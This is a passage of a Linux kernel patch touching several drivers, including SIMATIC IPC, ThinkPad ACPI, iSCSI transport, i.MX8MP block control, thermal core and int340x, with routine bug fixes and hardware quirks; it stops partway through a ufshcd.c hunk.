+diff --git a/drivers/platform/x86/simatic-ipc.c b/drivers/platform/x86/simatic-ipc.c
+index ca76076fc706a..b3622419cd1a4 100644
+--- a/drivers/platform/x86/simatic-ipc.c
++++ b/drivers/platform/x86/simatic-ipc.c
+@@ -46,7 +46,8 @@ static struct {
+ 	{SIMATIC_IPC_IPC427D, SIMATIC_IPC_DEVICE_427E, SIMATIC_IPC_DEVICE_NONE},
+ 	{SIMATIC_IPC_IPC427E, SIMATIC_IPC_DEVICE_427E, SIMATIC_IPC_DEVICE_427E},
+ 	{SIMATIC_IPC_IPC477E, SIMATIC_IPC_DEVICE_NONE, SIMATIC_IPC_DEVICE_427E},
+-	{SIMATIC_IPC_IPC427G, SIMATIC_IPC_DEVICE_227G, SIMATIC_IPC_DEVICE_227G},
++	{SIMATIC_IPC_IPCBX_39A, SIMATIC_IPC_DEVICE_227G, SIMATIC_IPC_DEVICE_227G},
++	{SIMATIC_IPC_IPCPX_39A, SIMATIC_IPC_DEVICE_NONE, SIMATIC_IPC_DEVICE_227G},
+ };
+ 
+ static int register_platform_devices(u32 station_id)
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 4e95d2243161a..7fd735c67a8e6 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -10500,8 +10500,7 @@ static int dytc_profile_set(struct platform_profile_handler *pprof,
+ 			if (err)
+ 				goto unlock;
+ 		}
+-	}
+-	if (dytc_capabilities & BIT(DYTC_FC_PSC)) {
++	} else if (dytc_capabilities & BIT(DYTC_FC_PSC)) {
+ 		err = dytc_command(DYTC_SET_COMMAND(DYTC_FUNCTION_PSC, perfmode, 1), &output);
+ 		if (err)
+ 			goto unlock;
+@@ -10529,14 +10528,16 @@ static void dytc_profile_refresh(void)
+ 			err = dytc_command(DYTC_CMD_MMC_GET, &output);
+ 		else
+ 			err = dytc_cql_command(DYTC_CMD_GET, &output);
+-	} else if (dytc_capabilities & BIT(DYTC_FC_PSC))
++		funcmode = DYTC_FUNCTION_MMC;
++	} else if (dytc_capabilities & BIT(DYTC_FC_PSC)) {
+ 		err = dytc_command(DYTC_CMD_GET, &output);
+-
++		/* Check if we are PSC mode, or have AMT enabled */
++		funcmode = (output >> DYTC_GET_FUNCTION_BIT) & 0xF;
++	}
+ 	mutex_unlock(&dytc_mutex);
+ 	if (err)
+ 		return;
+ 
+-	funcmode = (output >> DYTC_GET_FUNCTION_BIT) & 0xF;
+ 	perfmode = (output >> DYTC_GET_MODE_BIT) & 0xF;
+ 	convert_dytc_to_profile(funcmode, perfmode, &profile);
+ 	if (profile != dytc_current_profile) {
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index baae3120efd05..f00995390fdfe 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -264,6 +264,23 @@ static const struct ts_dmi_data connect_tablet9_data = {
+ 	.properties     = connect_tablet9_props,
+ };
+ 
++static const struct property_entry csl_panther_tab_hd_props[] = {
++	PROPERTY_ENTRY_U32("touchscreen-min-x", 1),
++	PROPERTY_ENTRY_U32("touchscreen-min-y", 20),
++	PROPERTY_ENTRY_U32("touchscreen-size-x", 1980),
++	PROPERTY_ENTRY_U32("touchscreen-size-y", 1526),
++	PROPERTY_ENTRY_BOOL("touchscreen-inverted-y"),
++	PROPERTY_ENTRY_BOOL("touchscreen-swapped-x-y"),
++	PROPERTY_ENTRY_STRING("firmware-name", "gsl1680-csl-panther-tab-hd.fw"),
++	PROPERTY_ENTRY_U32("silead,max-fingers", 10),
++	{ }
++};
++
++static const struct ts_dmi_data csl_panther_tab_hd_data = {
++	.acpi_name      = "MSSL1680:00",
++	.properties     = csl_panther_tab_hd_props,
++};
++
+ static const struct property_entry cube_iwork8_air_props[] = {
+ 	PROPERTY_ENTRY_U32("touchscreen-min-x", 1),
+ 	PROPERTY_ENTRY_U32("touchscreen-min-y", 3),
+@@ -1124,6 +1141,14 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Tablet 9"),
+ 		},
+ 	},
++	{
++		/* CSL Panther Tab HD */
++		.driver_data = (void *)&csl_panther_tab_hd_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "CSL Computer GmbH & Co. KG"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "CSL Panther Tab HD"),
++		},
++	},
+ 	{
+ 		/* CUBE iwork8 Air */
+ 		.driver_data = (void *)&cube_iwork8_air_data,
+diff --git a/drivers/reset/Kconfig b/drivers/reset/Kconfig
+index de176c2fbad96..2a52c990d4fec 100644
+--- a/drivers/reset/Kconfig
++++ b/drivers/reset/Kconfig
+@@ -257,7 +257,7 @@ config RESET_SUNXI
+ 
+ config RESET_TI_SCI
+ 	tristate "TI System Control Interface (TI-SCI) reset driver"
+-	depends on TI_SCI_PROTOCOL || COMPILE_TEST
++	depends on TI_SCI_PROTOCOL || (COMPILE_TEST && TI_SCI_PROTOCOL=n)
+ 	help
+ 	  This enables the reset driver support over TI System Control Interface
+ 	  available on some new TI's SoCs. If you wish to use reset resources
+diff --git a/drivers/reset/reset-uniphier-glue.c b/drivers/reset/reset-uniphier-glue.c
+index 146fd5d45e99d..15abac9fc72c0 100644
+--- a/drivers/reset/reset-uniphier-glue.c
++++ b/drivers/reset/reset-uniphier-glue.c
+@@ -47,7 +47,6 @@ static int uniphier_glue_reset_probe(struct platform_device *pdev)
+ 	struct device *dev = &pdev->dev;
+ 	struct uniphier_glue_reset_priv *priv;
+ 	struct resource *res;
+-	resource_size_t size;
+ 	int i, ret;
+ 
+ 	priv = devm_kzalloc(dev, sizeof(*priv), GFP_KERNEL);
+@@ -60,7 +59,6 @@ static int uniphier_glue_reset_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 
+ 	res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+-	size = resource_size(res);
+ 	priv->rdata.membase = devm_ioremap_resource(dev, res);
+ 	if (IS_ERR(priv->rdata.membase))
+ 		return PTR_ERR(priv->rdata.membase);
+@@ -96,7 +94,7 @@ static int uniphier_glue_reset_probe(struct platform_device *pdev)
+ 
+ 	spin_lock_init(&priv->rdata.lock);
+ 	priv->rdata.rcdev.owner = THIS_MODULE;
+-	priv->rdata.rcdev.nr_resets = size * BITS_PER_BYTE;
++	priv->rdata.rcdev.nr_resets = resource_size(res) * BITS_PER_BYTE;
+ 	priv->rdata.rcdev.ops = &reset_simple_ops;
+ 	priv->rdata.rcdev.of_node = dev->of_node;
+ 	priv->rdata.active_low = true;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_main.c b/drivers/scsi/hisi_sas/hisi_sas_main.c
+index 699b07abb6b0b..02fa3c00dcccf 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_main.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_main.c
+@@ -714,7 +714,7 @@ static int hisi_sas_init_device(struct domain_device *device)
+ 		int_to_scsilun(0, &lun);
+ 
+ 		while (retry-- > 0) {
+-			rc = sas_clear_task_set(device, lun.scsi_lun);
++			rc = sas_abort_task_set(device, lun.scsi_lun);
+ 			if (rc == TMF_RESP_FUNC_COMPLETE) {
+ 				hisi_sas_release_task(hisi_hba, device);
+ 				break;
+@@ -1334,7 +1334,7 @@ static void hisi_sas_refresh_port_id(struct hisi_hba *hisi_hba)
+ 				device->linkrate = phy->sas_phy.linkrate;
+ 
+ 			hisi_hba->hw->setup_itct(hisi_hba, sas_dev);
+-		} else
++		} else if (!port->port_attached)
+ 			port->id = 0xff;
+ 	}
+ }
+diff --git a/drivers/scsi/hpsa.c b/drivers/scsi/hpsa.c
+index 4dbf51e2623ad..f6da34850af9d 100644
+--- a/drivers/scsi/hpsa.c
++++ b/drivers/scsi/hpsa.c
+@@ -5850,7 +5850,7 @@ static int hpsa_scsi_host_alloc(struct ctlr_info *h)
+ {
+ 	struct Scsi_Host *sh;
+ 
+-	sh = scsi_host_alloc(&hpsa_driver_template, sizeof(h));
++	sh = scsi_host_alloc(&hpsa_driver_template, sizeof(struct ctlr_info));
+ 	if (sh == NULL) {
+ 		dev_err(&h->pdev->dev, "scsi_host_alloc failed\n");
+ 		return -ENOMEM;
+diff --git a/drivers/scsi/scsi_transport_iscsi.c b/drivers/scsi/scsi_transport_iscsi.c
+index f473c002fa4d6..bf834e72595a3 100644
+--- a/drivers/scsi/scsi_transport_iscsi.c
++++ b/drivers/scsi/scsi_transport_iscsi.c
+@@ -1677,6 +1677,13 @@ static const char *iscsi_session_state_name(int state)
+ 	return name;
+ }
+ 
++static char *iscsi_session_target_state_name[] = {
++	[ISCSI_SESSION_TARGET_UNBOUND]   = "UNBOUND",
++	[ISCSI_SESSION_TARGET_ALLOCATED] = "ALLOCATED",
++	[ISCSI_SESSION_TARGET_SCANNED]   = "SCANNED",
++	[ISCSI_SESSION_TARGET_UNBINDING] = "UNBINDING",
++};
++
+ int iscsi_session_chkready(struct iscsi_cls_session *session)
+ {
+ 	int err;
+@@ -1786,9 +1793,13 @@ static int iscsi_user_scan_session(struct device *dev, void *data)
+ 		if ((scan_data->channel == SCAN_WILD_CARD ||
+ 		     scan_data->channel == 0) &&
+ 		    (scan_data->id == SCAN_WILD_CARD ||
+-		     scan_data->id == id))
++		     scan_data->id == id)) {
+ 			scsi_scan_target(&session->dev, 0, id,
+ 					 scan_data->lun, scan_data->rescan);
++			spin_lock_irqsave(&session->lock, flags);
++			session->target_state = ISCSI_SESSION_TARGET_SCANNED;
++			spin_unlock_irqrestore(&session->lock, flags);
++		}
+ 	}
+ 
+ user_scan_exit:
+@@ -1961,31 +1972,41 @@ static void __iscsi_unbind_session(struct work_struct *work)
+ 	struct iscsi_cls_host *ihost = shost->shost_data;
+ 	unsigned long flags;
+ 	unsigned int target_id;
++	bool remove_target = true;
+ 
+ 	ISCSI_DBG_TRANS_SESSION(session, "Unbinding session\n");
+ 
+ 	/* Prevent new scans and make sure scanning is not in progress */
+ 	mutex_lock(&ihost->mutex);
+ 	spin_lock_irqsave(&session->lock, flags);
+-	if (session->target_id == ISCSI_MAX_TARGET) {
++	if (session->target_state == ISCSI_SESSION_TARGET_ALLOCATED) {
++		remove_target = false;
++	} else if (session->target_state != ISCSI_SESSION_TARGET_SCANNED) {
+ 		spin_unlock_irqrestore(&session->lock, flags);
+ 		mutex_unlock(&ihost->mutex);
+-		goto unbind_session_exit;
++		ISCSI_DBG_TRANS_SESSION(session,
++			"Skipping target unbinding: Session is unbound/unbinding.\n");
++		return;
+ 	}
+ 
++	session->target_state = ISCSI_SESSION_TARGET_UNBINDING;
+ 	target_id = session->target_id;
+ 	session->target_id = ISCSI_MAX_TARGET;
+ 	spin_unlock_irqrestore(&session->lock, flags);
+ 	mutex_unlock(&ihost->mutex);
+ 
+-	scsi_remove_target(&session->dev);
++	if (remove_target)
++		scsi_remove_target(&session->dev);
+ 
+ 	if (session->ida_used)
+ 		ida_free(&iscsi_sess_ida, target_id);
+ 
+-unbind_session_exit:
+ 	iscsi_session_event(session, ISCSI_KEVENT_UNBIND_SESSION);
+ 	ISCSI_DBG_TRANS_SESSION(session, "Completed target removal\n");
++
++	spin_lock_irqsave(&session->lock, flags);
++	session->target_state = ISCSI_SESSION_TARGET_UNBOUND;
++	spin_unlock_irqrestore(&session->lock, flags);
+ }
+ 
+ static void __iscsi_destroy_session(struct work_struct *work)
+@@ -2062,6 +2083,9 @@ int iscsi_add_session(struct iscsi_cls_session *session, unsigned int target_id)
+ 		session->ida_used = true;
+ 	} else
+ 		session->target_id = target_id;
++	spin_lock_irqsave(&session->lock, flags);
++	session->target_state = ISCSI_SESSION_TARGET_ALLOCATED;
++	spin_unlock_irqrestore(&session->lock, flags);
+ 
+ 	dev_set_name(&session->dev, "session%u", session->sid);
+ 	err = device_add(&session->dev);
+@@ -4369,6 +4393,19 @@ iscsi_session_attr(def_taskmgmt_tmo, ISCSI_PARAM_DEF_TASKMGMT_TMO, 0);
+ iscsi_session_attr(discovery_parent_idx, ISCSI_PARAM_DISCOVERY_PARENT_IDX, 0);
+ iscsi_session_attr(discovery_parent_type, ISCSI_PARAM_DISCOVERY_PARENT_TYPE, 0);
+ 
++static ssize_t
++show_priv_session_target_state(struct device *dev, struct device_attribute *attr,
++			char *buf)
++{
++	struct iscsi_cls_session *session = iscsi_dev_to_session(dev->parent);
++
++	return sysfs_emit(buf, "%s\n",
++			iscsi_session_target_state_name[session->target_state]);
++}
++
++static ISCSI_CLASS_ATTR(priv_sess, target_state, S_IRUGO,
++			show_priv_session_target_state, NULL);
++
+ static ssize_t
+ show_priv_session_state(struct device *dev, struct device_attribute *attr,
+ 			char *buf)
+@@ -4471,6 +4508,7 @@ static struct attribute *iscsi_session_attrs[] = {
+ 	&dev_attr_sess_boot_target.attr,
+ 	&dev_attr_priv_sess_recovery_tmo.attr,
+ 	&dev_attr_priv_sess_state.attr,
++	&dev_attr_priv_sess_target_state.attr,
+ 	&dev_attr_priv_sess_creator.attr,
+ 	&dev_attr_sess_chap_out_idx.attr,
+ 	&dev_attr_sess_chap_in_idx.attr,
+@@ -4584,6 +4622,8 @@ static umode_t iscsi_session_attr_is_visible(struct kobject *kobj,
+ 		return S_IRUGO | S_IWUSR;
+ 	else if (attr == &dev_attr_priv_sess_state.attr)
+ 		return S_IRUGO;
++	else if (attr == &dev_attr_priv_sess_target_state.attr)
++		return S_IRUGO;
+ 	else if (attr == &dev_attr_priv_sess_creator.attr)
+ 		return S_IRUGO;
+ 	else if (attr == &dev_attr_priv_sess_target_id.attr)
+diff --git a/drivers/soc/imx/imx8mp-blk-ctrl.c b/drivers/soc/imx/imx8mp-blk-ctrl.c
+index 0e3b6ba22f943..0f13853901dfe 100644
+--- a/drivers/soc/imx/imx8mp-blk-ctrl.c
++++ b/drivers/soc/imx/imx8mp-blk-ctrl.c
+@@ -212,7 +212,7 @@ static void imx8mp_hdmi_blk_ctrl_power_on(struct imx8mp_blk_ctrl *bc,
+ 		break;
+ 	case IMX8MP_HDMIBLK_PD_LCDIF:
+ 		regmap_set_bits(bc->regmap, HDMI_RTX_CLK_CTL0,
+-				BIT(7) | BIT(16) | BIT(17) | BIT(18) |
++				BIT(16) | BIT(17) | BIT(18) |
+ 				BIT(19) | BIT(20));
+ 		regmap_set_bits(bc->regmap, HDMI_RTX_CLK_CTL1, BIT(11));
+ 		regmap_set_bits(bc->regmap, HDMI_RTX_RESET_CTL0,
+@@ -241,6 +241,7 @@ static void imx8mp_hdmi_blk_ctrl_power_on(struct imx8mp_blk_ctrl *bc,
+ 		regmap_set_bits(bc->regmap, HDMI_TX_CONTROL0, BIT(1));
+ 		break;
+ 	case IMX8MP_HDMIBLK_PD_HDMI_TX_PHY:
++		regmap_set_bits(bc->regmap, HDMI_RTX_CLK_CTL0, BIT(7));
+ 		regmap_set_bits(bc->regmap, HDMI_RTX_CLK_CTL1, BIT(22) | BIT(24));
+ 		regmap_set_bits(bc->regmap, HDMI_RTX_RESET_CTL0, BIT(12));
+ 		regmap_clear_bits(bc->regmap, HDMI_TX_CONTROL0, BIT(3));
+@@ -270,7 +271,7 @@ static void imx8mp_hdmi_blk_ctrl_power_off(struct imx8mp_blk_ctrl *bc,
+ 				  BIT(4) | BIT(5) | BIT(6));
+ 		regmap_clear_bits(bc->regmap, HDMI_RTX_CLK_CTL1, BIT(11));
+ 		regmap_clear_bits(bc->regmap, HDMI_RTX_CLK_CTL0,
+-				  BIT(7) | BIT(16) | BIT(17) | BIT(18) |
++				  BIT(16) | BIT(17) | BIT(18) |
+ 				  BIT(19) | BIT(20));
+ 		break;
+ 	case IMX8MP_HDMIBLK_PD_PAI:
+@@ -298,6 +299,7 @@ static void imx8mp_hdmi_blk_ctrl_power_off(struct imx8mp_blk_ctrl *bc,
+ 	case IMX8MP_HDMIBLK_PD_HDMI_TX_PHY:
+ 		regmap_set_bits(bc->regmap, HDMI_TX_CONTROL0, BIT(3));
+ 		regmap_clear_bits(bc->regmap, HDMI_RTX_RESET_CTL0, BIT(12));
++		regmap_clear_bits(bc->regmap, HDMI_RTX_CLK_CTL0, BIT(7));
+ 		regmap_clear_bits(bc->regmap, HDMI_RTX_CLK_CTL1, BIT(22) | BIT(24));
+ 		break;
+ 	case IMX8MP_HDMIBLK_PD_HDCP:
+@@ -590,7 +592,6 @@ static int imx8mp_blk_ctrl_probe(struct platform_device *pdev)
+ 			ret = PTR_ERR(domain->power_dev);
+ 			goto cleanup_pds;
+ 		}
+-		dev_set_name(domain->power_dev, "%s", data->name);
+ 
+ 		domain->genpd.name = data->name;
+ 		domain->genpd.power_on = imx8mp_blk_ctrl_power_on;
+diff --git a/drivers/soc/imx/soc-imx8m.c b/drivers/soc/imx/soc-imx8m.c
+index 28144c699b0c3..32ed9dc88e455 100644
+--- a/drivers/soc/imx/soc-imx8m.c
++++ b/drivers/soc/imx/soc-imx8m.c
+@@ -66,8 +66,8 @@ static u32 __init imx8mq_soc_revision(void)
+ 	ocotp_base = of_iomap(np, 0);
+ 	WARN_ON(!ocotp_base);
+ 	clk = of_clk_get_by_name(np, NULL);
+-	if (!clk) {
+-		WARN_ON(!clk);
++	if (IS_ERR(clk)) {
++		WARN_ON(IS_ERR(clk));
+ 		return 0;
+ 	}
+ 
+diff --git a/drivers/soc/qcom/cpr.c b/drivers/soc/qcom/cpr.c
+index e9b854ed1bdfd..144ea68e0920a 100644
+--- a/drivers/soc/qcom/cpr.c
++++ b/drivers/soc/qcom/cpr.c
+@@ -1708,12 +1708,16 @@ static int cpr_probe(struct platform_device *pdev)
+ 
+ 	ret = of_genpd_add_provider_simple(dev->of_node, &drv->pd);
+ 	if (ret)
+-		return ret;
++		goto err_remove_genpd;
+ 
+ 	platform_set_drvdata(pdev, drv);
+ 	cpr_debugfs_init(drv);
+ 
+ 	return 0;
++
++err_remove_genpd:
++	pm_genpd_remove(&drv->pd);
++	return ret;
+ }
+ 
+ static int cpr_remove(struct platform_device *pdev)
+diff --git a/drivers/spi/spi-cadence-xspi.c b/drivers/spi/spi-cadence-xspi.c
+index 9e187f9c6c95e..d28b8bd5b70bc 100644
+--- a/drivers/spi/spi-cadence-xspi.c
++++ b/drivers/spi/spi-cadence-xspi.c
+@@ -177,7 +177,10 @@
+ #define CDNS_XSPI_CMD_FLD_DSEQ_CMD_3(op) ( \
+ 	FIELD_PREP(CDNS_XSPI_CMD_DSEQ_R3_DCNT_H, \
+ 		((op)->data.nbytes >> 16) & 0xffff) | \
+-	FIELD_PREP(CDNS_XSPI_CMD_DSEQ_R3_NUM_OF_DUMMY, (op)->dummy.nbytes * 8))
++	FIELD_PREP(CDNS_XSPI_CMD_DSEQ_R3_NUM_OF_DUMMY, \
++		  (op)->dummy.buswidth != 0 ? \
++		  (((op)->dummy.nbytes * 8) / (op)->dummy.buswidth) : \
++		  0))
+ 
+ #define CDNS_XSPI_CMD_FLD_DSEQ_CMD_4(op, chipsel) ( \
+ 	FIELD_PREP(CDNS_XSPI_CMD_DSEQ_R4_BANK, chipsel) | \
+diff --git a/drivers/spi/spidev.c b/drivers/spi/spidev.c
+index 6313e7d0cdf87..71c3db60e9687 100644
+--- a/drivers/spi/spidev.c
++++ b/drivers/spi/spidev.c
+@@ -601,7 +601,6 @@ static int spidev_open(struct inode *inode, struct file *filp)
+ 	if (!spidev->tx_buffer) {
+ 		spidev->tx_buffer = kmalloc(bufsiz, GFP_KERNEL);
+ 		if (!spidev->tx_buffer) {
+-			dev_dbg(&spidev->spi->dev, "open/ENOMEM\n");
+ 			status = -ENOMEM;
+ 			goto err_find_dev;
+ 		}
+@@ -610,7 +609,6 @@ static int spidev_open(struct inode *inode, struct file *filp)
+ 	if (!spidev->rx_buffer) {
+ 		spidev->rx_buffer = kmalloc(bufsiz, GFP_KERNEL);
+ 		if (!spidev->rx_buffer) {
+-			dev_dbg(&spidev->spi->dev, "open/ENOMEM\n");
+ 			status = -ENOMEM;
+ 			goto err_alloc_rx_buf;
+ 		}
+diff --git a/drivers/thermal/gov_fair_share.c b/drivers/thermal/gov_fair_share.c
+index a4ee4661e9cc4..1cfeac16e7ac1 100644
+--- a/drivers/thermal/gov_fair_share.c
++++ b/drivers/thermal/gov_fair_share.c
+@@ -49,11 +49,7 @@ static int get_trip_level(struct thermal_zone_device *tz)
+ static long get_target_state(struct thermal_zone_device *tz,
+ 		struct thermal_cooling_device *cdev, int percentage, int level)
+ {
+-	unsigned long max_state;
+-
+-	cdev->ops->get_max_state(cdev, &max_state);
+-
+-	return (long)(percentage * level * max_state) / (100 * tz->num_trips);
++	return (long)(percentage * level * cdev->max_state) / (100 * tz->num_trips);
+ }
+ 
+ /**
+diff --git a/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.c b/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.c
+index 62c0aa5d07837..0a4eaa307156d 100644
+--- a/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.c
++++ b/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.c
+@@ -44,11 +44,13 @@ static int int340x_thermal_get_trip_temp(struct thermal_zone_device *zone,
+ 					 int trip, int *temp)
+ {
+ 	struct int34x_thermal_zone *d = zone->devdata;
+-	int i;
++	int i, ret = 0;
+ 
+ 	if (d->override_ops && d->override_ops->get_trip_temp)
+ 		return d->override_ops->get_trip_temp(zone, trip, temp);
+ 
++	mutex_lock(&d->trip_mutex);
++
+ 	if (trip < d->aux_trip_nr)
+ 		*temp = d->aux_trips[trip];
+ 	else if (trip == d->crt_trip_id)
+@@ -66,10 +68,12 @@ static int int340x_thermal_get_trip_temp(struct thermal_zone_device *zone,
+ 			}
+ 		}
+ 		if (i == INT340X_THERMAL_MAX_ACT_TRIP_COUNT)
+-			return -EINVAL;
++			ret = -EINVAL;
+ 	}
+ 
+-	return 0;
++	mutex_unlock(&d->trip_mutex);
++
++	return ret;
+ }
+ 
+ static int int340x_thermal_get_trip_type(struct thermal_zone_device *zone,
+@@ -77,11 +81,13 @@ static int int340x_thermal_get_trip_type(struct thermal_zone_device *zone,
+ 					 enum thermal_trip_type *type)
+ {
+ 	struct int34x_thermal_zone *d = zone->devdata;
+-	int i;
++	int i, ret = 0;
+ 
+ 	if (d->override_ops && d->override_ops->get_trip_type)
+ 		return d->override_ops->get_trip_type(zone, trip, type);
+ 
++	mutex_lock(&d->trip_mutex);
++
+ 	if (trip < d->aux_trip_nr)
+ 		*type = THERMAL_TRIP_PASSIVE;
+ 	else if (trip == d->crt_trip_id)
+@@ -99,10 +105,12 @@ static int int340x_thermal_get_trip_type(struct thermal_zone_device *zone,
+ 			}
+ 		}
+ 		if (i == INT340X_THERMAL_MAX_ACT_TRIP_COUNT)
+-			return -EINVAL;
++			ret = -EINVAL;
+ 	}
+ 
+-	return 0;
++	mutex_unlock(&d->trip_mutex);
++
++	return ret;
+ }
+ 
+ static int int340x_thermal_set_trip_temp(struct thermal_zone_device *zone,
+@@ -180,6 +188,8 @@ int int340x_thermal_read_trips(struct int34x_thermal_zone *int34x_zone)
+ 	int trip_cnt = int34x_zone->aux_trip_nr;
+ 	int i;
+ 
++	mutex_lock(&int34x_zone->trip_mutex);
++
+ 	int34x_zone->crt_trip_id = -1;
+ 	if (!int340x_thermal_get_trip_config(int34x_zone->adev->handle, "_CRT",
+ 					     &int34x_zone->crt_temp))
+@@ -207,6 +217,8 @@ int int340x_thermal_read_trips(struct int34x_thermal_zone *int34x_zone)
+ 		int34x_zone->act_trips[i].valid = true;
+ 	}
+ 
++	mutex_unlock(&int34x_zone->trip_mutex);
++
+ 	return trip_cnt;
+ }
+ EXPORT_SYMBOL_GPL(int340x_thermal_read_trips);
+@@ -230,6 +242,8 @@ struct int34x_thermal_zone *int340x_thermal_zone_add(struct acpi_device *adev,
+ 	if (!int34x_thermal_zone)
+ 		return ERR_PTR(-ENOMEM);
+ 
++	mutex_init(&int34x_thermal_zone->trip_mutex);
++
+ 	int34x_thermal_zone->adev = adev;
+ 	int34x_thermal_zone->override_ops = override_ops;
+ 
+@@ -281,6 +295,7 @@ err_thermal_zone:
+ 	acpi_lpat_free_conversion_table(int34x_thermal_zone->lpat_table);
+ 	kfree(int34x_thermal_zone->aux_trips);
+ err_trip_alloc:
++	mutex_destroy(&int34x_thermal_zone->trip_mutex);
+ 	kfree(int34x_thermal_zone);
+ 	return ERR_PTR(ret);
+ }
+@@ -292,6 +307,7 @@ void int340x_thermal_zone_remove(struct int34x_thermal_zone
+ 	thermal_zone_device_unregister(int34x_thermal_zone->zone);
+ 	acpi_lpat_free_conversion_table(int34x_thermal_zone->lpat_table);
+ 	kfree(int34x_thermal_zone->aux_trips);
++	mutex_destroy(&int34x_thermal_zone->trip_mutex);
+ 	kfree(int34x_thermal_zone);
+ }
+ EXPORT_SYMBOL_GPL(int340x_thermal_zone_remove);
+diff --git a/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.h b/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.h
+index 3b4971df1b33b..8f9872afd0d3c 100644
+--- a/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.h
++++ b/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.h
+@@ -32,6 +32,7 @@ struct int34x_thermal_zone {
+ 	struct thermal_zone_device_ops *override_ops;
+ 	void *priv_data;
+ 	struct acpi_lpat_conversion_table *lpat_table;
++	struct mutex trip_mutex;
+ };
+ 
+ struct int34x_thermal_zone *int340x_thermal_zone_add(struct acpi_device *,
+diff --git a/drivers/thermal/thermal_core.c b/drivers/thermal/thermal_core.c
+index 615fdda3a5de7..1eae4ec719a8f 100644
+--- a/drivers/thermal/thermal_core.c
++++ b/drivers/thermal/thermal_core.c
+@@ -603,8 +603,7 @@ int thermal_zone_bind_cooling_device(struct thermal_zone_device *tz,
+ 	struct thermal_instance *pos;
+ 	struct thermal_zone_device *pos1;
+ 	struct thermal_cooling_device *pos2;
+-	unsigned long max_state;
+-	int result, ret;
++	int result;
+ 
+ 	if (trip >= tz->num_trips || trip < 0)
+ 		return -EINVAL;
+@@ -621,15 +620,11 @@ int thermal_zone_bind_cooling_device(struct thermal_zone_device *tz,
+ 	if (tz != pos1 || cdev != pos2)
+ 		return -EINVAL;
+ 
+-	ret = cdev->ops->get_max_state(cdev, &max_state);
+-	if (ret)
+-		return ret;
+-
+ 	/* lower default 0, upper default max_state */
+ 	lower = lower == THERMAL_NO_LIMIT ? 0 : lower;
+-	upper = upper == THERMAL_NO_LIMIT ? max_state : upper;
++	upper = upper == THERMAL_NO_LIMIT ? cdev->max_state : upper;
+ 
+-	if (lower > upper || upper > max_state)
++	if (lower > upper || upper > cdev->max_state)
+ 		return -EINVAL;
+ 
+ 	dev = kzalloc(sizeof(*dev), GFP_KERNEL);
+@@ -896,12 +891,22 @@ __thermal_cooling_device_register(struct device_node *np,
+ 	cdev->updated = false;
+ 	cdev->device.class = &thermal_class;
+ 	cdev->devdata = devdata;
++
++	ret = cdev->ops->get_max_state(cdev, &cdev->max_state);
++	if (ret) {
++		kfree(cdev->type);
++		goto out_ida_remove;
++	}
++
+ 	thermal_cooling_device_setup_sysfs(cdev);
++
+ 	ret = dev_set_name(&cdev->device, "cooling_device%d", cdev->id);
+ 	if (ret) {
++		kfree(cdev->type);
+ 		thermal_cooling_device_destroy_sysfs(cdev);
+-		goto out_kfree_type;
++		goto out_ida_remove;
+ 	}
++
+ 	ret = device_register(&cdev->device);
+ 	if (ret)
+ 		goto out_kfree_type;
+@@ -927,6 +932,8 @@ out_kfree_type:
+ 	thermal_cooling_device_destroy_sysfs(cdev);
+ 	kfree(cdev->type);
+ 	put_device(&cdev->device);
++
++	/* thermal_release() takes care of the rest */
+ 	cdev = NULL;
+ out_ida_remove:
+ 	ida_free(&thermal_cdev_ida, id);
+diff --git a/drivers/thermal/thermal_sysfs.c b/drivers/thermal/thermal_sysfs.c
+index ec495c7dff035..bd75961254615 100644
+--- a/drivers/thermal/thermal_sysfs.c
++++ b/drivers/thermal/thermal_sysfs.c
+@@ -589,13 +589,8 @@ static ssize_t max_state_show(struct device *dev, struct device_attribute *attr,
+ 			      char *buf)
+ {
+ 	struct thermal_cooling_device *cdev = to_cooling_device(dev);
+-	unsigned long state;
+-	int ret;
+ 
+-	ret = cdev->ops->get_max_state(cdev, &state);
+-	if (ret)
+-		return ret;
+-	return sprintf(buf, "%ld\n", state);
++	return sprintf(buf, "%ld\n", cdev->max_state);
+ }
+ 
+ static ssize_t cur_state_show(struct device *dev, struct device_attribute *attr,
+@@ -625,6 +620,10 @@ cur_state_store(struct device *dev, struct device_attribute *attr,
+ 	if ((long)state < 0)
+ 		return -EINVAL;
+ 
++	/* Requested state should be less than max_state + 1 */
++	if (state > cdev->max_state)
++		return -EINVAL;
++
+ 	mutex_lock(&cdev->lock);
+ 
+ 	result = cdev->ops->set_cur_state(cdev, state);
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index b048357d21e36..fb5c9e2fc5348 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -1231,12 +1231,14 @@ static int ufshcd_clock_scaling_prepare(struct ufs_hba *hba)
+ 	 * clock scaling is in progress
+ 	 */
+ 	ufshcd_scsi_block_requests(hba);
++	mutex_lock(&hba->wb_mutex);
+ 	down_write(&hba->clk_scaling_lock);
+ 
+ 	if (!hba->clk_scaling.is_allowed ||
+ 	    ufshcd_wait_for_doorbell_clr(hba, DOORBELL_CLR_TOUT_US)) {
+ 		ret = -EBUSY;
+ 		up_write(&hba->clk_scaling_lock);
++		mutex_unlock(&hba->wb_mutex);
